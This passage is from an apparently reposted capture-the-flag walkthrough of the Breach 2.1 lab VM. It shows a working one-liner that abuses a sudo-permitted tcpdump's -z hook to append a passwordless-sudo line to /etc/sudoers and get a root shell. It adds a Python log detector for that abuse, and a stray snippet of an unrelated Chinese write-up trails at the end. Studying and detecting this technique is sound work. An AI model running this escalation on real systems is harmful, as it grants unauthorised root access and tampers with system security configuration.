User blumbergh may run the following commands on breach2:
  (root) NOPASSWD: /usr/sbin/tcpdump


Check tcpdump's usage

sudo /usr/sbin/tcpdump -h

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ sudo /usr/sbin/tcpdump -h
tcpdump version 4.6.2
libpcap version 1.6.2
OpenSSL 1.0.1t 3 May 2016
Usage: tcpdump [-aAbdDefhHIJKlLnNOpqRStuUvxX#] [ -B size ] [ -c count ]
              [ -C file_size ] [ -E algo:secret ] [ -F file ] [ -G seconds ]
              [ -i interface ] [ -j tstamptype ] [ -M secret ] [ --number ]
              [ -Q in|out|inout ]
              [ -r file ] [ -s snaplen ] [ --time-stamp-precision precision ]
              [ -T type ] [ --version ] [ -V file ]
              [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z command ]
              [ -Z user ] [ expression ]

tcpdump's -z runs a command after each capture-file rotation, and -Z sets the user it drops privileges to. With -G 1 -W 1 the capture rotates after one second and stops after one file, so the script runs exactly once, as root (the "dropped privs to root" line is the effect of -Z; without it Debian's tcpdump drops to its own unprivileged user and the hook would run as that user). The script grants blumbergh passwordless sudo for every command, after which sudo -i gives a root shell. Note that echoing straight into /etc/sudoers bypasses visudo's syntax check; a malformed line breaks sudo for every user, so outside a CTF drop a file under /etc/sudoers.d and validate it with visudo -cf first.

echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/shell.sh && chmod +x /tmp/shell.sh && sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root && sudo -i

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/shell.sh && chmod +x /tmp/shell.sh && sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null  -W 1 -G 1 -z /tmp/shell.sh -Z root && sudo -i
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
root@breach2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@breach2:~# whoami
root
root@breach2:~#
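From the defender's side, the escalation above is a single line in sudo's log: a sudo-permitted tcpdump invoked as root with -z pointing at a script the caller controls. The block below is an added example, not part of the original write-up, that parses sudo's syslog lines, pulls the -z command and -Z user out of any tcpdump argv, and flags hooks living in user-writable directories. The four log lines are constructed to match sudo's syslog format (they are not from the Breach 2.1 VM), so the script runs offline.

```python
"""Detect sudo-driven abuse of tcpdump's post-rotate hook in sudo's syslog
output. Added example, not part of the original write-up; the log lines
below are constructed in sudo's syslog format, not taken from the VM."""
import os
import re
import shlex

# "<ts> <host> sudo: <runner> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(r"sudo(?:\[\d+\])?:\s+(?P<runner>\S+) : (?P<fields>.+)$")
# directories an unprivileged user can normally write to
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

SAMPLE_AUTH_LOG = [  # constructed sample lines
    "May 12 09:21:07 breach2 sudo: blumbergh : TTY=pts/1 ; PWD=/home/blumbergh ; USER=root ; COMMAND=/usr/sbin/tcpdump -i eth0 -c 10",
    "May 12 09:25:13 breach2 sudo: blumbergh : TTY=pts/1 ; PWD=/var/www/html2 ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root",
    "May 12 09:26:40 breach2 sudo: peter : TTY=pts/0 ; PWD=/home/peter ; USER=root ; COMMAND=/bin/ls /root",
    "May 12 09:27:02 breach2 sshd[2345]: Accepted password for peter from 192.168.110.128 port 59798 ssh2",
]


def parse_sudo_line(line):
    """Split one sudo syslog line into its fields, or None if it is not one."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    rec = {"runner": m.group("runner")}
    for field in m.group("fields").split(" ; "):
        key, _, value = field.partition("=")
        rec[key] = value          # COMMAND is last, so its spaces survive
    return rec


def tcpdump_postrotate_hook(argv):
    """Return (-z command, -Z user) from a tcpdump argv, None where absent.
    Accepts both '-z cmd' and the glued '-zcmd' spelling getopt allows."""
    hook = user = None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-z", "-Z") and i + 1 < len(argv):
            value = argv[i + 1]
            i += 1
        elif arg.startswith(("-z", "-Z")) and len(arg) > 2:
            value = arg[2:]
        else:
            i += 1
            continue
        if arg.startswith("-z"):
            hook = value
        else:
            user = value
        i += 1
    return hook, user


def detect_tcpdump_abuse(lines):
    """Report every sudo'd tcpdump that registers a post-rotate command."""
    findings = []
    for line in lines:
        rec = parse_sudo_line(line)
        if rec is None or "COMMAND" not in rec:
            continue
        argv = shlex.split(rec["COMMAND"])
        if not argv or os.path.basename(argv[0]) != "tcpdump":
            continue
        hook, user = tcpdump_postrotate_hook(argv)
        if hook is None:
            continue
        findings.append({
            "runner": rec["runner"],
            "as_user": rec.get("USER"),
            "hook": hook,
            "hook_user": user,   # None: tcpdump's build-time drop-to user
            "writable_hook": hook.startswith(WRITABLE_DIRS),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_tcpdump_abuse(SAMPLE_AUTH_LOG):
        print(finding)
```

Only the second line is reported: a hook at /tmp/shell.sh, run as root via -Z root, launched by blumbergh. The benign ten-packet capture on the first line has no hook and is ignored, which keeps the rule from firing on ordinary administrative use of the same sudo entry.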

7. Getting the flag

cd /root/

python .flag.py

root@breach2:~# cd /root/
root@breach2:~# ls -al
total 60
drwx------ 7 root root 4096 Jul 20 2016 .
drwxr-xr-x 22 root root 4096 Jun 20 2016 ..
-rw------- 1 root root   0 Jun 18 2016 .Xauthority
drwx------ 2 root root 4096 Jun 21 2016 .aptitude
-rw------- 1 root root   61 May 10 06:59 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 root root 4096 Jun 19 2016 .cache
drwx------ 3 root root 4096 Jun 19 2016 .config
-rw-r--r-- 1 root root 5074 Jun 22 2016 .flag.py
drwx------ 4 root root 4096 Jun 19 2016 .mozilla
-rw------- 1 root root 958 Jun 21 2016 .mysql_history
-rw------- 1 root root   44 Jul 20 2016 .nano_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rw-r--r-- 1 root root   66 Jun 16 2016 .selected_editor
drwx------ 2 root root 4096 Jun 19 2016 .ssh
root@breach2:~# python .flag.py


#========================================================================================#
# ___                                               ___                                 #
#(   )                                             (   )                                 #
# | |.-.   ___ .-.     .--.     .---.   .--.     | | .-.       .--.             .-.   #
# | /   \ (   )   \   /   \   / .-, \ /   \   | |/   \     ; _ \         /   \ #
# | .-. | | ' .-. ; | .-. ; (__) ; | | .-. ;   | .-. .   (___)` |       | .-. ; #
# | | | | | / (___) | | | |   .'` | | |(___) | | | |         ' '       | | | | #
# | | | | | |       | |/ | / .'| | | |       | | | |       / /         | | | | #
# | | | | | |       | ' _.' | / | | | | ___   | | | |       / /         | | | | #
# | ' | | | |       | .'.-. ; | ; | | '(   ) | | | |     / /     .-. | ' | | #
# ' `-' ;   | |       ' `-' / ' `-' | ' `-' |   | | | |     / '____ (   ) ' `-' / #
# `.__.   (___)       `.__.' `.__.'_. `.__,'   (___)(___)   (_______) `-'   `.__,' #
#                                                                                       #
#========================================================================================#


Congratulations on reaching the end. I have learned a ton putting together these challenges and I hope you enjoyed it and perhaps learned something new. Stay tuned for the final in the series, Breach 3.0

Shout-out to sizzop, knightmare and rastamouse for testing and g0tmi1k for hosting and maintaining #vulnhub.

-mrb3n




root@breach2:~#

8. Summary

The account with more privileges is not necessarily the one that can be escalated further; a low-privileged account may have a direct path to root.

From: https://www.cnblogs.com/HKalpa/p/17393494.html

    前言点击>>下载靶机靶机kalilinux:ip地址为192.168.20.200靶机探测使用nmap探测靶机nmap192.168.20.0/24靶机ip为192.168.20.131使用nmap进行详细扫描nmap-A-p-192.168.20.131点击查看扫描结果rootin/home/kalivia☕v17.0.6…➜nmap-A-p-192.168.2......